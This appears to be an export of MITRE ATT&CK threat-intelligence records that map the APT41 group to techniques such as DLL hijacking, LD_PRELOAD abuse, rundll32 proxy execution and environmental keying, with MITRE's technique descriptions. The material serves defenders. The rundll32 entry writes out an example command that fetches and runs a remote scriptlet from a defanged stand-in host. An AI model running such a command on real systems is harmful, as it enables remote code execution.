tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1553.002
matrix : mitre-attack
platform : ['macOS', 'Windows']
data_sources : ['File: File Metadata']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has added user accounts to the User and Admin groups.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--373f6762-cda6-4ce7-894f-cac31a09a98b
revoked : False
technique : Account Manipulation
technique_description : Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1098
matrix : mitre-attack
platform : ['Windows', 'Azure AD', 'Office 365', 'IaaS', 'Linux', 'macOS', 'Google Workspace', 'SaaS', 'Network', 'Containers']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Active Directory: Active Directory Object Modification', 'File: File Modification', 'Group: Group Modification', 'User Account: User Account Modification']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [pwdump](https://attack.mitre.org/software/S0006), [PowerSploit](https://attack.mitre.org/software/S0194), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--35f5f7b9-8b86-4390-9f99-1d56aa1ae32a
revoked : False
technique : Tool
technique_description : Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) was not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1588.002
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Malware Repository: Malware Metadata']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has uploaded files and data from a compromised host.(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--54f6c1c8-f3c7-44a6-9a00-2195e03cf0ae
revoked : False
technique : Data from Local System
technique_description : Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
technique_id : T1005
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Process: OS API Execution', 'Script: Script Execution', 'Command: Command Execution', 'Process: Process Creation', 'File: File Access']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has created services to appear as benign system tools.(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--fce88056-31db-43be-be76-fb1aaf076ed1
revoked : False
technique : Masquerade Task or Service
technique_description : Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1036.004
matrix : mitre-attack
platform : ['Windows', 'Linux', 'macOS']
data_sources : ['Scheduled Job: Scheduled Job Modification', 'Service: Service Creation', 'Command: Command Execution', 'Service: Service Metadata', 'Scheduled Job: Scheduled Job Metadata']
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used rundll32.exe to execute a loader.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--898211c4-915c-469f-be47-321d2d44af90
revoked : False
technique : Rundll32
technique_description : Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe rather than executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)) may avoid triggering security tools that do not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL)

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1218.011
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Metadata', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used search order hijacking to execute malicious payloads, such as Winnti RAT.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06
revoked : False
technique : DLL Search Order Hijacking
technique_description : Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program.(Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.

There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks,(Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL.(Citation: Microsoft Security Advisory 2269637)

Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Modification', 'Module: Module Load', 'File: File Creation']
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has transferred implant files using Windows Admin Shares.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--39808511-28ac-4cff-b6b4-49d996855e8a
revoked : False
technique : SMB/Windows Admin Shares
technique_description : Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
technique_id : T1021.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Share: Network Share Access', 'Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Creation', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has configured payloads to load via LD_PRELOAD.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--7f9fe6d5-79ba-44ca-bf19-c980e5c2fc11
revoked : False
technique : Dynamic Linker Hijacking
technique_description : Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher-level syntax such as Python's <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle)(Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers)

On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic linker (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.006
matrix : mitre-attack
platform : ['Linux', 'macOS']
data_sources : ['File: File Creation', 'Command: Command Execution', 'Module: Module Load', 'Process: Process Creation', 'File: File Modification']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. [APT41](https://attack.mitre.org/groups/G0096) has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.(Citation: Twitter ItsReallyNick APT41 EK)
relationship_id : relationship--5212a108-111b-4467-84c9-933d2b84aad2
revoked : False
technique : Environmental Keying
technique_description : Adversaries may environmentally key payloads or other features of malware to evade defenses and constrain execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary-supplied, environment-specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload, the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1480.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
